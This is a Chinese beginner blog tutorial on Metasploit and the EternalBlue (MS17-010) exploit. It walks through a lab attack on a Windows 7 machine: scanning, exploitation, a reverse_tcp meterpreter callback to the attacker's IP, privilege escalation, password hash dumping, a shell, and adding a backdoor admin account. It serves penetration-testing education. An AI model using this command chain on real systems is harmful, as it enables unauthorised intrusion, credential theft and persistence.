网络安全零基础入门(第十章-3)利用工具快速拿下服务器(KaLi-MSF)

  • 每日一句:学习是一个循序渐进的过程,不要懈怠。
  • 本篇内容:认识MSF和永恒之蓝
         MSF的基础命令
         漏洞利用基本流程
         实战漏洞利用

一、认识MSF和永恒之蓝

1.定义
    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具
       
    我们能够通过它发现漏洞并进行快速实施攻击(需要在授权的情况下!)
      //这款“美少妇”工具kali自带
          
2.使用
    第一次使用MSF
    开启数据库:service postgresql start
    初始化msf数据库: msfdb init
    开启MSF: msfconsole
    
    注意:
      ~这是初始化msf的默认数据库,不然运行会比较慢
        以后再使用的话,就直接开启msf即可
         
      ~MSF的启动漫画是随机的

二、MSF的基础命令

1.msf5的五大模块
    ~auxiliary  辅助模块
      为渗透测试信息搜集提供了大量的辅助模块支持
    
      命名规则:
        操作系统/服务/名称
        windows/smb/ms17_010_eternalblue
  
    ~Exploits  攻击模块
      利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,
      从而获得对远程目标系统访问权的代码组件。
       
    ~Payload  攻击载荷模块
      攻击成功后促使靶机运行的一段植入代码
      
      命名规则:
        操作系统/类型/名称
        windows/x64/meterpreter/reverse_tcp
         
    ~Post  后渗透攻击模块
      收集更多信息或进一步访问被利用的目标系统
      
    ~Encoders  编码模块
      将攻击载荷进行编码,来绕过防护软件拦截
        
2.常用命令
    ~help/?   帮助菜单
    
    ~exit    退出msf
    
    ~Back    返回
    
    ~show   显示所给类型的模块
      例如:show auxiliary   //查看辅助模块
      
      补充:
        ~rank表示好用级别:
          normal(正常),
          excellent(优秀),
          good(良好),
          average(平均)
            
        ~数字
          代表一种作用,可以直接用前边数字调用
             
    ~info   显示一个或者多个模块的信息
        例如: info windows/smb/ms17_010_eternalblue
           
    ~search   寻找
        例如:search ms17
      
    ~更新MSF:apt-get install metasploit-framework

三、漏洞利用基本流程

1.扫描靶机
    use auxiliary/scanner/smb/smb_ms17_010   //使用辅助模块
     
    进入此模块,输入options,
    在这个下,我们可以看看我们需要设置哪些参数
      
      ( Required栏为“yes”的参数,要不是系统已经设置好的
       要不就是需要我们设置的 )
    例如 :我们设置rhosts, set rhosts 192.168.221.129
    
2.选择exploit
    之后出现的结果,前边出现绿色的“[+]”且后边出现我们的目标IP
      就说明我们可以进行攻击
      
    back 返回上一级
    
    use exploit/windows/smb/ms17_010_eternalblue
    
    option看一下
    
    set rhosts 192.168.221.129
       
3.选择payload
    set payload windows/x64/meterpreter/reverse_tcp
    
    options看一下(因为payload也需要设置配置)
    
    set lhosts 192.168.221.133  //lhosts是本机IP
      //设置之后,我们之前打进去的木马,就会来找我们的IP
         
4.攻击   exploit
   
5.提权   getsystem
   
6.枚举密码   hashdump  //一般密码都是加密的
     
7.去拿个shell   shell
    
8.查看权限    whoami
    
9.在尝试添加一个账户
    net user admin admin /add
       
10.在看看所有用户 net user
    //本次攻击靶机是win 7 sp1 //win 7 企业版

四、实战漏洞利用

1.正反向连接
    ~正向连接 : 我们去连接木马
    ~反向连接 : 木马来连接我们 //这个更稳定一些,且不太容易被拦截
    
2.不熟悉的话,多练习几遍
   
3.提权的原理
    对面(目标)运行的一些程序具有高权限,
    我们利用这个进程执行一些命令,以达到我么的目的
    iis6.0de提权 建议百度一下

五、总结

  • 理解KaLi-MSF的原理
  • 熟悉MSF的基本命令
  • 掌握漏洞利用基本流程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值